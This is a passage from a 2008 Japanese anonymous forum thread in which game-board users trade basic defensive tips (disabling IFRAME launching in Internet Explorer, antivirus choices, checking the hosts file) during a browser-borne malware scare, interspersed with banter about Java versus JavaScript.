   ・セキュリティタブをクリックし→「レベルのカスタマイズ」ボタンをクリック。
   ・ずーっと下の方にスクロールさせていくと、「その他」の項目に
    「IFRAMEのプログラムとファイルの起動」という項目がありますので
    「無効にする」を選んでOKボタンをクリック。

ベターなアンチウィルスソフトとかは諸説あるから好きに決めましょう。何でも無いよりマシ!
(どれがいいか悩んだらカスペルスキー入れとけ新種の対応が早いらしい)
○○してるから大丈夫だよね!ってひとはヤバイです。
すなわちこれやってるから安心ってわけでもないです。ウィルスや散布方法は日々変わっています。常に警戒を怠らないでね!
他にもマメにパスを変えるとか色々あるよ〜自衛しよう!


876 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 19:06:09.17 ID:KlTCqiN9]
ユーザの多そうな Sleipnir も中身は IE なんだよな
他にもあるだろうけど、そういうのがまとまってるページは無いんだろうか

877 名前:既にその名前は使われています [2008/03/25(火) 19:06:46.73 ID:EH31oboY]
>>871
どうみてもアカハクで使われててお題になってんのはスクリプトの方でした
重箱の隅ありがとう御座いました。
今後はジャバスーと略しますね。

878 名前:既にその名前は使われています [2008/03/25(火) 19:07:53.68 ID:+icz0Gmv]
NTTの対策ツールじゃ何も出なかったけど、カスペルでやったらc:\windows\system32\etc\hostsにTrojan.VBS.Qhost.cってのが…
でもc:\windows\system32\etc\hostsを開こうとしても使用できない場所を参照していますって出るし、大丈夫なんだろうか?

879 名前:既にその名前は使われています [2008/03/25(火) 19:08:06.32 ID:i7D5eJ48]
PCで一切のサイト閲覧しなければ安全性が高そうだな。
攻略とかは携帯で調べるとか。

880 名前:既にその名前は使われています [2008/03/25(火) 19:10:37.73 ID:JIu1wKVr]
>878
driversが抜けてる。
notepad %Systemroot%\system32\drivers\etc\hosts



881 名前:既にその名前は使われています [2008/03/25(火) 19:11:00.54 ID:HImxVR+r]
>>877
カタカナでジャバとかJAVAとか全角で書くと、高ヘイトを稼げるぞ。
ジャバスーも良い感じだ。ジャバスクとかでもおk。

882 名前:既にその名前は使われています [2008/03/25(火) 19:11:27.66 ID:cG7zxlfp]
>>808
WindowsでWebブラウズする限りどんなブラウザ使っても意味なし。
Macでブラウズすればおk

883 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 19:11:39.38 ID:gCK0NHd/]
>>873
おおおおお ありがとう!早速遣ってみる

884 名前:既にその名前は使われています [2008/03/25(火) 19:12:04.94 ID:EH31oboY]
>>881
ぶっちゃけJAVAとJavaで普通は通じるけどね(苦笑)

885 名前:既にその名前は使われています [2008/03/25(火) 19:13:00.54 ID:cG7zxlfp]
>>828
いいこと言うね。まさにその通りだと思う。
どんな対策でも、それだけでは必ず抜け道がある。
だが、いろいろな対策を組み合わせることで
セキュリティ度が高まっていく。

886 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 19:13:25.68 ID:KlTCqiN9]
消えてしまったJ#のこと、時々でいいから思い出してください

887 名前:既にその名前は使われています [2008/03/25(火) 19:13:31.79 ID:znglEp69]
下らん揚げ足取りでいつまでも喧嘩すんなw

888 名前:既にその名前は使われています [2008/03/25(火) 19:14:47.33 ID:b1jIPTS8]
JAVASCRIPUTO

889 名前:既にその名前は使われています [2008/03/25(火) 19:15:03.35 ID:HImxVR+r]
>>871
今時AJAXとか基本なのに中二病とかwww
ゆとり乙wwwwww





……あれを考案した奴を殴りに行きたい。

890 名前:既にその名前は使われています [2008/03/25(火) 19:15:25.66 ID:avAH3FeL]
>>884
どこのマムージャだよ



891 名前:既にその名前は使われています [2008/03/25(火) 19:15:41.68 ID:Ua1VAnox]
Java=Javaアプレットとか言い出すやつまででてきたか…

892 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 19:17:30.35 ID:lDWZxEjC]
ジャバザハット

893 名前:既にその名前は使われています [2008/03/25(火) 19:17:35.27 ID:HImxVR+r]
>>891
ブラウザのオプションに限って言えばアプレットやがな。

894 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 19:19:24.85 ID:KlTCqiN9]
>>887
まあ、こんな展開になるのも
事態がひとまず落ち着いてきたってことさw

……全く進展はしてないけどな

895 名前:既にその名前は使われています [2008/03/25(火) 19:21:48.15 ID:CJuWmpLQ]
とりあえず各乱立スレが900〜1000逝きそうな奴からここに誘導かけてったらいい?

896 名前:既にその名前は使われています [2008/03/25(火) 19:22:46.18 ID:b1jIPTS8]
ネ実見て動く■のことだからそろそろ動くのかな

897 名前:既にその名前は使われています [2008/03/25(火) 19:22:55.08 ID:l09pbsl7]
ブラウザはOpera使ってるんですけどこれは大丈夫ですか?

898 名前:既にその名前は使われています [2008/03/25(火) 19:24:15.39 ID:cG7zxlfp]
>>897
Windows上でWebブラウザを使っている限り、
どれ使っても危険はつきまとう。
ただ、まぁIEよりはマシという程度。
Webブラウズしただけで感染、ということがいやなら
LinuxとかMacとか使え。

899 名前:既にその名前は使われています [2008/03/25(火) 19:33:45.12 ID:HImxVR+r]
>>898
過去、Linuxでも、カーネルやユーザランドに大穴が開くことが何度もあった。
Macも同様。セキュリティに注意しなきゃ何使っても変わらん。






[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<269KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef